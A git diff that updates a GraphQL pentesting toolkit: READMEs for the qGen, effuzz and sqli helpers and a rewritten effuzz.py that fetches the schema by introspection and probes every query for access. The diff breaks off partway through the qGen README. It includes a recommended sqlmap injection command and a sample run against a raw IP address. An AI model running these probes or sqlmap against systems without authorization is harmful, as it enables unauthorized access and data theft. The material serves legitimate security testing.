diff --git a/README.md b/README.md index 91d8457..47ed220 100644 --- a/README.md +++ b/README.md @@ -1,37 +1,87 @@ # GraphQL-Scripts -This repository contains a series of useful scripts for pentesting GraphQL endpoints. +This repository contains a set of small utilities to help with security testing and exploration of GraphQL endpoints. -## Basic Information +Included tools +- qGen — interactive Query Generator: lists schema methods and generates full GraphQL queries (selection sets) for a chosen method. +- effuzz — Endpoint Fuzzer: enumerates query/mutation names from a schema and performs lightweight requests to identify methods you can call (ffuf-like for GraphQL). +- sqli — SQLi Detector helper: probes string arguments for SQL injection indicators and writes sqlmap marker files for reproducible testing. -This repository contains two scripts: [qGen.py](https://github.com/gitblanc/GraphQL-Scripts/tree/main/qGen) and [effuzz.py](https://github.com/gitblanc/GraphQL-Scripts/tree/main/effuzz). -- `qGen.py` allows you to list all the methods available in your GraphQL schema and then generate a query to dump all possible information with a method (like `findAllUsers`). -- `effuzz.py` allows you to check permissions in all the methods of your GraphQL schema (similar output to `ffuf`). +Quick notes +- Tools accept an introspection JSON file via `--introspection`. +- If `--introspection` is omitted, `qGen` and `effuzz` can fetch the schema automatically from `--url` (requires the `requests` package). Automatic introspection is saved by default to `introspection_schema.json` (disable with `--no-save-introspection`). +- Use these tools only on systems for which you have explicit authorization. -## Methodology to use +Requirements +- Python 3.7+ +- For automatic introspection / HTTP requests: pip install requests ->[!Important] ->You must have previously obtained the result of an introspection query and save it to a json file like `introspection_schema.json` - -- You can first run `effuzz.py` to check for interesting methods allowed for your session: +Basic workflow (recommended) +1. Use `effuzz` to quickly determine which methods the current session can call (permission discovery). +2. Use `qGen` to generate a full query for an interesting method and paste the result into your GraphQL client (Burp, Postman, GraphiQL, etc.). +3. Optionally use the `sqli` helper to target string arguments for SQLi checks and produce sqlmap marker files. 
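+
+Obtaining the introspection file manually
+- The troubleshooting sections below suggest capturing the schema yourself (with curl, GraphiQL, or another client) when automatic fetching is blocked. A minimal sketch with curl, assuming a standard POST endpoint (the short query here only lists type names; substitute a full introspection query, such as the one embedded in qGen/effuzz, for real use):
+
+```shell
+curl -s -X POST https://example.com/graphql \
+  -H 'Content-Type: application/json' \
+  -d '{"query":"{ __schema { types { name } } }"}' \
+  -o introspection_schema.json
+```
+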
+effuzz — quick example
+- Run with a saved introspection file:
 ```shell
-python3 effuzz.py --introspection /path/to/introspection_schema.json --url https://example.com/graphql
+python3 effuzz/effuzz.py --introspection /path/to/introspection_schema.json --url https://example.com/graphql
+```
 
-[redacted]
-getAllTests [Status: 401] [Size: 32] [Words: 5] [Lines: 1]
-getAllUsers [Status: 400] [Size: 261] [Words: 25] [Lines: 1] #<----- This indicates a malformed query, so you have permissions for this one
-getAllConfigs [Status: 200] [Size: 48] [Words: 15] [Lines: 1] #<----- You also have permissions for this one
+- Sample output (sanitized):
+```text
+[✓] Introspection loaded (120 queries, 8 mutations)
+------------------------------------------------------------
+getAllTests     [Status: 401] [Size: 32] [Words: 5] [Lines: 1]
+getAllUsers     [Status: 400] [Size: 261] [Words: 25] [Lines: 1]   # malformed query -> server accepted request (likely allowed)
+getAllConfigs   [Status: 200] [Size: 48] [Words: 15] [Lines: 1]   # likely accessible
+------------------------------------------------------------
+(Use --debug to dump full responses)
 ```
-
-- Once you obtained those methods which might interest you, you can run `qGen.py` and generate a query for that method:
+What to infer from effuzz output
+- 401 / 403: authentication/authorization required.
+- 400: GraphQL often returns 400 for malformed queries; if the server returns 400 rather than 401, it usually indicates your request reached the server (the method exists and you may have permission).
+- 200: successful request — inspect the body for `data` or `errors`.
+
+qGen — quick example
+- Run with a saved introspection file:
 ```shell
-python3 qGen.py --introspection /path/to/introspection_schema.json
+python3 qGen/qGen.py --introspection /path/to/introspection_schema.json
+```
+
+- Interactive session (sanitized):
+```text
+qGen $ listMethods
+  [1] getAllUsers
+  [2] getUserById
 
-[redacted]
 qGen $ use getAllUsers
-qGen $ genQuery
+# The full query is printed and saved to queries/getAllUsers.txt
+```
+
+Notes about qGen
+- The `use` command selects a method and immediately generates & saves the full query (no separate `genQuery` step).
+- Generated queries are saved in the `queries/` directory.
+
+sqli helper — quick example
+- Install requirements (if provided) or at minimum:
+```bash
+pip install requests
+```
+
+- Run it (headers can be passed as a JSON string; see the script's help for other options):
+```bash
+python3 sqli/sqli_detector.py https://example.com/graphql '{"Authorization":"Bearer TOKEN"}'
+```
+
+- Sample output (sanitized):
+```text
+VULNERABLE PARAMETER: username (field: user)
+Evidence: Baseline != Attack (baseline {"data": {"user": null}}, attack {"data": {"user": {"uuid": "1"}}})
+Recommended sqlmap command:
+sqlmap -r 'repro-payloads/user_username___marker.http' -p "JSON[query]" --batch --skip-urlencode --parse-errors --random-agent
 ```
 
-- Now you can copy the query generated and paste it into BurpSuite, PostMan or GraphiQL.
+Security & ethics
+- These tools actively probe targets; run them only on systems you are authorized to test.
+- Inspect any generated marker files before running sqlmap or other automated tooling.
diff --git a/effuzz/README.md b/effuzz/README.md
index 692c7aa..16dc965 100644
--- a/effuzz/README.md
+++ b/effuzz/README.md
@@ -1,6 +1,7 @@
-# Endpoint Fuzzer
+# Endpoint Fuzzer (effuzz)
 
-This script helps you check for methods you've got permissions in your GraphQL schema.
+This script helps you detect which GraphQL methods you may be able to call (or have permissions for) by enumerating Query/Mutation names from an introspection schema and performing lightweight checks. ```shell ███████╗███████╗███████╗██╗ ██╗███████╗███████╗ @@ -8,55 +9,127 @@ This script helps you check for methods you've got permissions in your GraphQL s █████╗ █████╗ █████╗ ██║ ██║ ███╔╝ ███╔╝ ██╔══╝ ██╔══╝ ██╔══╝ ██║ ██║ ███╔╝ ███╔╝ ███████╗██║ ██║ ╚██████╔╝███████╗███████╗ -╚══════╝╚═╝ ╚═╝ ╚═════╝ ╚══════╝╚══════╝ +╚══════╝╚═╝ ╚═╝ ╚═════╝╚══════╝╚══════╝ ``` +## Overview + +effuzz enumerates available fields from a GraphQL schema and issues minimal GraphQL requests for each method to learn how the server responds. It is useful to quickly spot methods that accept requests (status 200/400) versus those that deny access (401/403) or cause other errors. + +Two modes: +- Explicit introspection: supply a previously saved introspection JSON with `--introspection`. +- Automatic introspection: omit `--introspection` and provide `--url`; effuzz will attempt to fetch the schema from the endpoint (requires the `requests` library). By default the fetched introspection is saved to `introspection_schema.json` (toggle with `--no-save-introspection`). + +Note: Use these tools only on targets you are authorized to test. + +## Requirements + +- Python 3.7+ +- requests (only required for automatic introspection / HTTP requests): + pip install requests + ## Usage ->[!Important] ->You must have previously obtained the result of an introspection query and save it to a json file like `introspection_schema.json`. +Important: either provide a local introspection JSON or let effuzz fetch it automatically from the target with `--url`. -- Basic command: +- Using a saved introspection file (explicit mode): ```shell -python3 effuzz.py --introspection /path/to/introspection_schema.json --url https://example.com/graphql +python3 effuzz/effuzz.py --introspection /path/to/introspection_schema.json --url https://example.com/graphql ``` -- If you have cookie and/or variables to anidate queries: +- Automatic introspection (effuzz fetches the schema from the endpoint): ```shell -python3 effuzz.py --introspection /path/to/introspection_schema.json --url https://example.com/graphql --cookie /path/to/cookie.txt --variables /path/to/variables.json +python3 effuzz/effuzz.py --url https://example.com/graphql \ + -H "Authorization: Bearer TOKEN" \ + --cookie /path/to/cookie.txt ``` -- Enable debug mode to check petitions and responses: +- With variables file and cookie: ```shell -python3 effuzz.py --introspection /path/to/introspection_schema.json --url https://example.com/graphql --debug +python3 effuzz/effuzz.py --introspection /path/to/introspection_schema.json \ + --url https://example.com/graphql \ + --cookie /path/to/cookie.txt \ + --variables /path/to/variables.json ``` -- Match exact reponse status codes: +- Enable debug to inspect request and response bodies: ```shell -python3 effuzz.py --introspection /path/to/introspection_schema.json --url https://example.com/graphql --mc 200,403 +python3 effuzz/effuzz.py --introspection introspection_schema.json --url https://example.com/graphql --debug ``` -- Hide responses with matching status codes: +- Match specific response status codes (show only these): ```shell -python3 effuzz.py --introspection /path/to/introspection_schema.json --url https://example.com/graphql --fc 200,403 +python3 effuzz/effuzz.py --introspection introspection_schema.json --url https://example.com/graphql 
--match-code 200,403 ``` -## Available commands - -- You can use the following commands: +- Filter out specific status codes (hide these): ```shell - --introspection Path to the introspection JSON file - --url GraphQL endpoint URL - -s | --silent Only show endpoints that DO NOT return 401 - --cookie File containing cookie in plain text (one line) - --variables JSON file with variables for the payload - --debug Show full request and response - --match-code | -mc Show only responses with matching status codes (e.g., 200,403,500) - --filter-code | -fc Hide responses with matching status codes (e.g., 401,404) +python3 effuzz/effuzz.py --introspection introspection_schema.json --url https://example.com/graphql --filter-code 401,404 +``` + +## Important options + +```text +--introspection Path to the introspection JSON file (optional if --url is used) +--url GraphQL endpoint URL (required for automatic introspection) +-H, --header Add HTTP header(s) for requests; repeatable. Format: "Name: Value" +-s, --silent Hide responses that return 401 +--cookie File containing cookie value (one line); ignored if Cookie provided via -H +--variables JSON file with variables to include in requests +--debug Print full request and response bodies (helps troubleshooting) +--match-code, -mc Show only responses with these status codes (comma separated) +--filter-code, -fc Hide responses that match these status codes (comma separated) +--save-introspection Save automatic introspection to introspection_schema.json (default) +--no-save-introspection Do not save automatic introspection to disk ``` + +## Example output + +A short sample run (values and counts are illustrative): + +```text +$ python3 effuzz/effuzz.py --introspection introspection_schema.json --url http://94.237.63.174:57732/graphql + +[✓] Introspection loaded (120 queries, 8 mutations) +------------------------------------------------------------ +getAllTests [Status: 401] [Size: 32] [Words: 5] [Lines: 1] +getAllUsers [Status: 400] [Size: 261] [Words: 25] [Lines: 1] # malformed query -> server accepted request +getAllConfigs [Status: 200] [Size: 48] [Words: 15] [Lines: 1] # likely accessible +findUserByEmail [Status: 200] [Size: 512] [Words: 80] [Lines: 3] # returns data +------------------------------------------------------------ +(Use --debug to dump full responses) +``` + +Notes on interpreting results: +- 401 / 403: usually indicates authentication/authorization required. +- 400: GraphQL servers commonly return 400 for syntactically invalid or semantically wrong queries – this can still mean the method exists and the server processed the request. +- 200: successful request; check response body for `data` or `errors` to decide further steps. + +## Troubleshooting + +- Automatic introspection fails: + - Ensure `--url` points to the GraphQL endpoint. + - Provide proper auth headers with `-H "Authorization: Bearer ..."` or use `--cookie`. + - Check that the server accepts the introspection query (some servers disable it). + - If the endpoint returns non-JSON or a wrapper format, effuzz may not detect `__schema`. + +- Requests fail with network errors: + - Try increasing timeout in the code or check network connectivity/proxy settings. + +- Too many fields / huge schema: + - Consider filtering or generating smaller payloads when using the `--variables` option or modifying the request loop. + +## Security & ethics + +Only run effuzz on systems you are authorized to test. These tools are intended for legitimate security testing and research. 
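+
+## Probe shape (reference)
+
+Every check effuzz performs is a minimal, selection-free query built from the method name (see `build_minimal_query_for_method` in the source). This is why methods that exist but require arguments or a selection set often answer 400 rather than 200; for example, probing `getAllUsers` sends:
+
+```graphql
+query { getAllUsers }
+```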
+
+## Further reading / next steps
+
+- Use qGen to generate full queries for interesting methods discovered by effuzz.
+- Use the sqli helper to target string arguments found in introspection for simple SQLi checks.
diff --git a/effuzz/effuzz.py b/effuzz/effuzz.py
index ee31dd1..ccf5de1 100644
--- a/effuzz/effuzz.py
+++ b/effuzz/effuzz.py
@@ -1,251 +1,366 @@
 #!/usr/bin/env python3
+"""
+effuzz.py - GraphQL endpoint fuzzer
+
+Main behavior:
+- If --introspection /path/to/file.json is passed, load (and validate) that JSON.
+- If --introspection is omitted, automatically run the introspection query against
+  the endpoint given by --url, using the headers (-H/--header) and --cookie if provided.
+  By default the introspection is saved to introspection_schema.json (disable with --no-save-introspection).
+- Extract queries and mutations from the schema and run a basic ffuf-style check
+  (send requests and print status/size/words/lines).
+- Keeps the options: --variables (JSON), --debug, --match-code, --filter-code, -s/--silent.
+"""
+
+# Postponed annotation evaluation keeps this module importable even when
+# 'requests' is missing (annotations below reference requests.Response).
+from __future__ import annotations
+
+import os
+import sys
 import json
-import requests
 import argparse
-import sys
-import os
-
-# =====================================================
-# COLORS
-# =====================================================
-RED = "\033[91m"
-YELLOW = "\033[93m"
-MAGENTA = "\033[95m"
-GREEN = "\033[92m"
-CYAN = "\033[36m"
+import textwrap
+from typing import Dict, Any, List, Optional, Tuple
+
+# Try to import requests; tell the user if it is missing
+try:
+    import requests
+except Exception:
+    requests = None
+
+# ANSI colors
+RED = "\033[31m"
+GREEN = "\033[32m"
+YELLOW = "\033[33m"
+BLUE = "\033[34m"
 RESET = "\033[0m"
-
+
 def print_banner():
-    print(f"""
-{YELLOW}
-███████╗███████╗███████╗██╗   ██╗███████╗███████╗
-██╔════╝██╔════╝██╔════╝██║   ██║╚══███╔╝╚══███╔╝
-█████╗  █████╗  █████╗  ██║   ██║  ███╔╝   ███╔╝ 
-██╔══╝  ██╔══╝  ██╔══╝  ██║   ██║ ███╔╝   ███╔╝  
-███████╗██║     ██║     ╚██████╔╝███████╗███████╗
-╚══════╝╚═╝     ╚═╝      ╚═════╝ ╚══════╝╚══════╝
-                                           v1.0
-{RESET}
-
-{CYAN}made by gitblanc — https://github.com/gitblanc/GraphQL-Scripts{RESET}
-
-""")
-
-# =====================================================
-# CLI ARGUMENTS
-# =====================================================
-parser = argparse.ArgumentParser(description="Test GraphQL endpoints using introspection.")
-parser.add_argument("--introspection", required=True, help="Path to the introspection JSON file")
-parser.add_argument("--url", required=True, help="GraphQL endpoint URL")
-
-parser.add_argument("-s", "--silent", action="store_true",
-                    help="Only show endpoints that DO NOT return 401")
-
-parser.add_argument("--cookie", help="File containing cookie in plain text (one line)")
-parser.add_argument("--variables", help="JSON file with variables for the payload")
-parser.add_argument("--debug", action="store_true", help="Show full request and response")
-parser.add_argument("--match-code", "-mc",
-                    help="Show only responses with matching status codes (e.g., 200,403,500)")
-parser.add_argument("--filter-code", "-fc",
-                    help="Hide responses with matching status codes (e.g., 401,404)")
-
-args = parser.parse_args()
-
-GRAPHQL_URL = args.url
-INTROSPECTION_FILE = args.introspection
-
-# Parse match-code
-match_codes = None
-if args.match_code:
-    match_codes = set(int(x.strip()) for x in args.match_code.split(",") if x.strip().isdigit())
-
-# Parse filter-code
-filter_codes = None
-if args.filter_code:
-    filter_codes = set(int(x.strip()) for x in args.filter_code.split(",") if x.strip().isdigit())
-
-print_banner()
-
-# =====================================================
-# VALIDATE FILE
-# =====================================================
-if not os.path.exists(INTROSPECTION_FILE):
-    print(f"❌ File not found: {INTROSPECTION_FILE}")
-    sys.exit(1)
-
-try:
-    with open(INTROSPECTION_FILE, "r") as f:
-        introspection_data = json.load(f)
-except json.JSONDecodeError:
-    print("❌ The introspection file is NOT valid JSON.")
-    sys.exit(1)
-
-# =====================================================
-# LOAD COOKIE AND VARIABLES
-# =====================================================
-cookie_value = None
-if args.cookie:
-    if not os.path.exists(args.cookie):
-        print(f"❌ Cookie file not found: {args.cookie}")
-        sys.exit(1)
-    with open(args.cookie, "r") as f:
-        cookie_value = f.read().strip()
-
-variables_value = {}
-if args.variables:
-    if not os.path.exists(args.variables):
-        print(f"❌ Variables file not found: {args.variables}")
-        sys.exit(1)
-    try:
-        with open(args.variables, "r") as f:
-            variables_value = json.load(f)
-    except:
-        print("❌ Variables file is NOT valid JSON.")
-        sys.exit(1)
-
-# =====================================================
-# EXTRACT QUERIES / MUTATIONS FROM THE SCHEMA
-# =====================================================
-if "data" not in introspection_data:
-    print("❌ JSON does not contain 'data' key. Not valid introspection.")
-    sys.exit(1)
-
-schema = introspection_data["data"].get("__schema", {})
-types = schema.get("types", [])
-
-def get_fields(type_name):
-    for t in types:
-        if t.get("name") == type_name:
-            return [f["name"] for f in t.get("fields", [])]
-    return []
-
-query_type_name = schema.get("queryType", {}).get("name")
-mutation_type_name = schema.get("mutationType", {}).get("name")
-
-queries = get_fields(query_type_name) if query_type_name else []
-mutations = get_fields(mutation_type_name) if mutation_type_name else []
-
-print(f"[✓] Introspection loaded ({len(queries)} queries, {len(mutations)} mutations)")
-print("------------------------------------------------------------")
-
-# =====================================================
-# HEADERS (With or without authentication)
-# =====================================================
-HEADERS = {
-    "Content-Type": "application/json"
+    print(textwrap.dedent(f"""
+    {YELLOW}
+    ███████╗███████╗███████╗██╗   ██╗███████╗███████╗
+    ██╔════╝██╔════╝██╔════╝██║   ██║╚══███╔╝╚══███╔╝
+    █████╗  █████╗  █████╗  ██║   ██║  ███╔╝   ███╔╝ 
+    ██╔══╝  ██╔══╝  ██╔══╝  ██║   ██║ ███╔╝   ███╔╝  
+    ███████╗██║     ██║     ╚██████╔╝███████╗███████╗
+    ╚══════╝╚═╝     ╚═╝      ╚═════╝ ╚══════╝╚══════╝
+    {RESET}
+    """))
+
+# Introspection query (complete enough for our purposes)
+INTROSPECTION_QUERY = """
+query IntrospectionQuery {
+  __schema {
+    queryType { name }
+    mutationType { name }
+    types {
+      kind
+      name
+      fields(includeDeprecated: true) {
+        name
+        args {
+          name
+          type { kind name ofType { kind name ofType { kind name } } }
+        }
+        type { kind name ofType { kind name } }
+      }
+    }
+  }
 }
-
-if cookie_value:
-    HEADERS["Cookie"] = cookie_value
-
-# =====================================================
-# FFUF-LIKE PROCESSING
-# =====================================================
-def response_stats(resp):
-    text = resp.text
+"""
+
+def parse_header_list(headers_list: List[str]) -> Dict[str, str]:
+    """
+    Convert a list of 'Name: Value' strings to a dict. The last value wins for duplicates.
+    """
+    hdrs: Dict[str, str] = {}
+    for h in headers_list or []:
+        if ":" not in h:
+            print(f"⚠️ Ignoring malformed header (expected 'Name: Value'): {h}")
+            continue
+        name, value = h.split(":", 1)
+        hdrs[name.strip()] = value.strip()
+    return hdrs
+
+def perform_introspection_request(url: str, headers: Dict[str, str], timeout: int = 15) -> Optional[Dict[str, Any]]:
+    """
+    Send the POST request with the introspection query.
+    Returns the JSON dict if it is valid, or None on failure.
+    """
+    if requests is None:
+        print("❌ The 'requests' library is required to fetch introspection automatically. Install it with: pip install requests")
+        return None
+    try:
+        resp = requests.post(url, headers=headers, json={"query": INTROSPECTION_QUERY}, timeout=timeout)
+    except requests.exceptions.RequestException as e:
+        print(f"❌ HTTP error while requesting introspection: {e}")
+        return None
+
+    try:
+        data = resp.json()
+    except Exception as e:
+        print(f"❌ Response is not valid JSON: {e}")
+        return None
+
+    if (isinstance(data, dict) and
+            ((data.get("data") and isinstance(data["data"], dict) and "__schema" in data["data"]) or ("__schema" in data))):
+        return data
+
+    print("❌ Introspection response does not contain '__schema' (not a valid GraphQL introspection).")
+    return None
+
+def save_introspection_file(data: Dict[str, Any], path: str = "introspection_schema.json") -> None:
+    try:
+        with open(path, "w", encoding="utf-8") as fh:
+            json.dump(data, fh, indent=2, ensure_ascii=False)
+        print(f"✅ Introspection saved to: {path}")
+    except Exception as e:
+        print(f"⚠️ Failed to save introspection to {path}: {e}")
+
+def load_introspection_from_path(path: str) -> Optional[Dict[str, Any]]:
+    try:
+        with open(path, "r", encoding="utf-8") as f:
+            data = json.load(f)
+        return data
+    except json.JSONDecodeError:
+        print(f"❌ The introspection file is not valid JSON: {path}")
+        return None
+    except Exception as e:
+        print(f"❌ Error reading {path}: {e}")
+        return None
+
+def response_stats(resp: requests.Response) -> Tuple[int, int, int]:
+    text = resp.text or ""
     size = len(text)
     words = len(text.split())
    lines = text.count("\n") + 1
     return size, words, lines
-
-def color_status(code, resp):
-    """Assign a color according to the real response type."""
-
+
+def color_status(code: int, resp: requests.Response) -> str:
+    """
+    Return the status code colored according to the response type.
+    A light heuristic that mimics the original behavior.
+    """
     if code == 200:
         try:
             data = resp.json()
             if "errors" not in data:
                 return f"{GREEN}{code}{RESET}"
-        except:
+        except Exception:
             pass
         return f"{YELLOW}{code}{RESET}"
-
+
     if code in (401, 403) or "Method forbidden" in resp.text:
         return f"{RED}{code}{RESET}"
-
+
     if code in (400, 500):
         return f"{YELLOW}{code}{RESET}"
-
+
     return str(code)
-
-
-def test_endpoint(name, is_mutation=False):
-
-    if is_mutation:
-        gql = f"mutation {name} {{ {name} }}"
-    else:
-        gql = f"query {name} {{ {name} }}"
-
-    body = {
-        "operationName": name,
-        "variables": variables_value,
-        "query": gql
-    }
-
+
+def build_minimal_query_for_method(method_name: str) -> str:
+    """
+    Build a simple query to test the method.
+    We try the shape: query { methodName }
+    If the method requires args or a selection set, the endpoint will answer with an error (400), and that is reported as such.
+    """
+    return f"query {{ {method_name} }}"
+
+def perform_request(url: str, headers: Dict[str, str], payload: Dict[str, Any], timeout: int = 15) -> Optional[requests.Response]:
+    if requests is None:
+        print("❌ The 'requests' library is required to run effuzz. Install it with: pip install requests")
+        return None
     try:
-        if args.debug:
-            print("\n====================== REQUEST ======================")
-            print("→ Endpoint:", GRAPHQL_URL)
-            print("→ Headers:", json.dumps(HEADERS, indent=2))
-            print("→ Sent body:")
-            print(json.dumps(body, indent=2))
-        resp = requests.post(GRAPHQL_URL, headers=HEADERS, json=body)
-        if args.debug:
-            print("\n====================== RESPONSE =====================")
-            print("← HTTP Status:", resp.status_code)
-            try:
-                print(json.dumps(resp.json(), indent=2))
-            except:
-                print(resp.text)
-            print("=====================================================\n")
-    except Exception:
+        resp = requests.post(url, headers=headers, json=payload, timeout=timeout)
+        return resp
+    except requests.exceptions.RequestException as e:
+        print(f"❌ Request error for {url}: {e}")
         return None
-
-    size, words, lines = response_stats(resp)
-    status_colored = color_status(resp.status_code, resp)
-
-    return {
-        "status": status_colored,
-        "status_raw": resp.status_code,
-        "size": size,
-        "words": words,
-        "lines": lines,
+
+def get_fields_from_schema(schema: Dict[str, Any]) -> Tuple[List[str], List[str]]:
+    types = schema.get("types", []) if isinstance(schema, dict) else []
+    def get_fields(type_name: str):
+        if not type_name:
+            return []
+        for t in types:
+            if t.get("name") == type_name:
+                return [f["name"] for f in t.get("fields", [])] if t.get("fields") else []
+        return []
+    query_type_name = schema.get("queryType", {}).get("name")
+    mutation_type_name = schema.get("mutationType", {}).get("name")
+    queries = get_fields(query_type_name)
+    mutations = get_fields(mutation_type_name)
+    return queries, mutations
+
+def main():
+    print_banner()
+
+    parser = argparse.ArgumentParser(description="Test GraphQL endpoints using introspection.")
+    # Now introspection is optional: if omitted we will query the endpoint automatically
+    parser.add_argument("--introspection", required=False, help="Path to the introspection JSON file")
+    parser.add_argument("--url", required=True, help="GraphQL endpoint URL")
+
+    parser.add_argument("-s", "--silent", action="store_true",
+                        help="Only show endpoints that DO NOT return 401")
+
+    parser.add_argument("--cookie", help="File containing cookie in plain text (one line)")
+    parser.add_argument("--variables", help="JSON file with variables for the payload")
+    parser.add_argument("--debug", action="store_true", help="Show full request and response")
+    parser.add_argument("--match-code", "-mc",
+                        help="Show only responses with matching status codes (e.g., 200,403,500)")
+    parser.add_argument("--filter-code", "-fc",
+                        help="Hide responses with matching status codes (e.g., 401,404)")
+
+    # Support repeated headers -H "Name: Value"
+    parser.add_argument("-H", "--header", action="append", default=[], help="Additional HTTP header to include (can be repeated). Format: 'Name: Value'")
+
+    # Control saving of automatic introspection (default: save)
+    parser.add_argument("--save-introspection", dest="save_introspection", action="store_true", help="Save automatic introspection to introspection_schema.json")
+    parser.add_argument("--no-save-introspection", dest="save_introspection", action="store_false", help="Do not save automatic introspection to disk")
+    parser.set_defaults(save_introspection=True)
+
+    args = parser.parse_args()
+
+    GRAPHQL_URL = args.url
+    INTROSPECTION_FILE = args.introspection
+
+    match_codes = None
+    if args.match_code:
+        match_codes = set(int(x.strip()) for x in args.match_code.split(",") if x.strip().isdigit())
+
+    filter_codes = None
+    if args.filter_code:
+        filter_codes = set(int(x.strip()) for x in args.filter_code.split(",") if x.strip().isdigit())
+
+    # Build headers
+    extra_headers = parse_header_list(args.header)
+    HEADERS: Dict[str, str] = {
+        "Content-Type": "application/json"
     }
-
-# =====================================================
-# FFUF-LIKE OUTPUT
-# =====================================================
-def print_result(name, r):
-    if r is None:
-        return
-
-    status_raw = r["status_raw"]
-
-    if args.silent and status_raw == 401:
-        return
-
-    if match_codes is not None and status_raw not in match_codes:
-        return
-
-    if filter_codes is not None and status_raw in filter_codes:
-        return
-
-    print(
-        f"{CYAN}{name}{RESET} "
-        f"[Status: {r['status']}] "
-        f"[Size: {r['size']}] "
-        f"[Words: {r['words']}] "
-        f"[Lines: {r['lines']}] "
-    )
-
-# ========================= QUERIES ==========================
-for q in queries:
-    res = test_endpoint(q)
-    print_result(q, res)
-
-# ========================= MUTATIONS ==========================
-for m in mutations:
-    res = test_endpoint(m, is_mutation=True)
-    print_result(m, res)
-
-print("\n[✓] Test completed.\n")
+
+    # Cookie file handling: gives precedence to explicit -H Cookie
+    if args.cookie:
+        if not os.path.exists(args.cookie):
+            print(f"❌ Cookie file not found: {args.cookie}")
+            sys.exit(1)
+        with open(args.cookie, "r", encoding="utf-8") as f:
+            cookie_value = f.read().strip()
+        if "Cookie" not in extra_headers:
+            extra_headers["Cookie"] = cookie_value
+
+    HEADERS.update(extra_headers)
+
+    # Load variables file if provided
+    variables_value: Dict[str, Any] = {}
+    if args.variables:
+        if not os.path.exists(args.variables):
+            print(f"❌ Variables file not found: {args.variables}")
+            sys.exit(1)
+        try:
+            with open(args.variables, "r", encoding="utf-8") as f:
+                variables_value = json.load(f)
+        except Exception:
+            print("❌ Variables file is NOT valid JSON.")
+            sys.exit(1)
+
+    introspection_data: Optional[Dict[str, Any]] = None
+
+    # If the user provided a file, load it
+    if INTROSPECTION_FILE:
+        if not os.path.exists(INTROSPECTION_FILE):
+            print(f"❌ File not found: {INTROSPECTION_FILE}")
+            sys.exit(1)
+        introspection_data = load_introspection_from_path(INTROSPECTION_FILE)
+        if introspection_data is None:
+            sys.exit(1)
+        print(f"✅ Introspection loaded from: {INTROSPECTION_FILE}")
+    else:
+        # No introspection file provided -> perform introspection automatically
+        print(f"[*] No --introspection provided; attempting to fetch introspection from {GRAPHQL_URL} ...")
+        result = perform_introspection_request(GRAPHQL_URL, HEADERS)
+        if result is None:
+            print("❌ Could not obtain introspection from the endpoint. Exiting.")
+            sys.exit(1)
+        introspection_data = result
+        print("✅ Introspection obtained from the endpoint.")
+        if args.save_introspection:
+            save_introspection_file(introspection_data, path="introspection_schema.json")
+
+    # Validate introspection structure
+    if not isinstance(introspection_data, dict):
+        print("❌ The loaded introspection is not a valid JSON object.")
+        sys.exit(1)
+
+    # Support both shapes: {"data": {"__schema": ...}} or {"__schema": ...}
+    schema = None
+    if "data" in introspection_data and isinstance(introspection_data["data"], dict):
+        schema = introspection_data["data"].get("__schema", {})
+    else:
+        schema = introspection_data.get("__schema", {})
+
+    if not isinstance(schema, dict) or not schema:
+        print("❌ '__schema' was not found in the introspection, or it is invalid.")
+        sys.exit(1)
+
+    types = schema.get("types", [])
+
+    # Extract queries and mutations
+    def get_fields(type_name: Optional[str]):
+        if not type_name:
+            return []
+        for t in types:
+            if t.get("name") == type_name:
+                return [f["name"] for f in t.get("fields", [])] if t.get("fields") else []
+        return []
+
+    query_type_name = schema.get("queryType", {}).get("name")
+    mutation_type_name = schema.get("mutationType", {}).get("name")
+
+    queries = get_fields(query_type_name) if query_type_name else []
+    mutations = get_fields(mutation_type_name) if mutation_type_name else []
+
+    print(f"[✓] Introspection loaded ({len(queries)} queries, {len(mutations)} mutations)")
+    print("------------------------------------------------------------")
+
+    # ========================================================================
+    # Minimal ffuf-like processing: for each method in queries, send one request
+    # and print status/size/words/lines. This block can be extended with payloads,
+    # status-code handling, filters, etc. (it keeps the basic behavior of the original).
+    # ========================================================================
+
+    if not queries:
+        print("⚠️ No queries found to test.")
+    else:
+        print("Testing queries (minimal requests):")
+        for qname in queries:
+            payload_query = build_minimal_query_for_method(qname)
+            payload = {"query": payload_query}
+            # If global variables were provided, include them (even though the minimal query does not use them)
+            if variables_value:
+                payload["variables"] = variables_value
+            resp = perform_request(GRAPHQL_URL, HEADERS, payload)
+            if resp is None:
+                print(f"{qname:30} -> {RED}request failed{RESET}")
+                continue
+            code = resp.status_code
+            size, words, lines = response_stats(resp)
+            colored = color_status(code, resp)
+            # Apply filters if present
+            if match_codes and code not in match_codes:
+                continue
+            if filter_codes and code in filter_codes:
+                continue
+            if args.silent and code == 401:
+                continue
+
+            print(f"{qname:30} [Status: {colored}] [Size: {size}] [Words: {words}] [Lines: {lines}]")
+
+            if args.debug:
+                try:
+                    print("---- RESPONSE JSON ----")
+                    print(json.dumps(resp.json(), indent=2, ensure_ascii=False))
+                except Exception:
+                    print("---- RESPONSE TEXT ----")
+                    print(resp.text)
+
+    print("------------------------------------------------------------")
+    print("effuzz finished. (This script performs a basic check; modify the loop to add payloads, concurrency, or other heuristics as needed.)")
+
+if __name__ == "__main__":
+    main()
diff --git a/qGen/README.md b/qGen/README.md
index bae69d8..020d5af 100644
--- a/qGen/README.md
+++ b/qGen/README.md
@@ -1,4 +1,5 @@
-# Query Generator
+# Query Generator (qGen)
 
 This script helps you to generate sample queries for enormous GraphQL endpoints.
 
@@ -14,26 +15,38 @@ This script helps you to generate sample queries for enormous GraphQL endpoints.
 ## Usage
 
 >[!Important]
->You must have previously obtained the result of an introspection query and save it to a json file like `introspection_schema.json`.
+>You must either provide a saved introspection JSON file (e.g. `introspection_schema.json`) or allow qGen to fetch introspection automatically from a GraphQL endpoint by supplying `--url`. Automatic introspection requires the `requests` package.
 
-- You must execute the script like this:
+- To run with a local introspection file:
 
 ```shell
 python3 qGen.py --introspection /path/to/introspection_schema.json
 ```
 
-- Then you'll be prompted with an interactive terminal:
+- To run and let qGen obtain the introspection from a live endpoint (automatic mode):
+
+```shell
+python3 qGen.py --url https://example.com/graphql \
+  -H "Authorization: Bearer TOKEN" \
+  --cookie /path/to/cookie.txt
+```
+
+Notes:
+- Automatic introspection requires the Python package `requests` (install with `pip install requests`).
+- When qGen fetches introspection automatically, the result is saved by default to `introspection_schema.json`. Use `--no-save-introspection` to avoid saving the file.
+
+- After starting, you'll be prompted with an interactive terminal:
 
 ```shell
 qGen $
 ```
 
-### Option 1
+### Option 1 — List and select by index
 
-- You can list all methods and mutations available in your schema and select the one you are interested in:
+You can list all methods available in your schema and select the one you want:
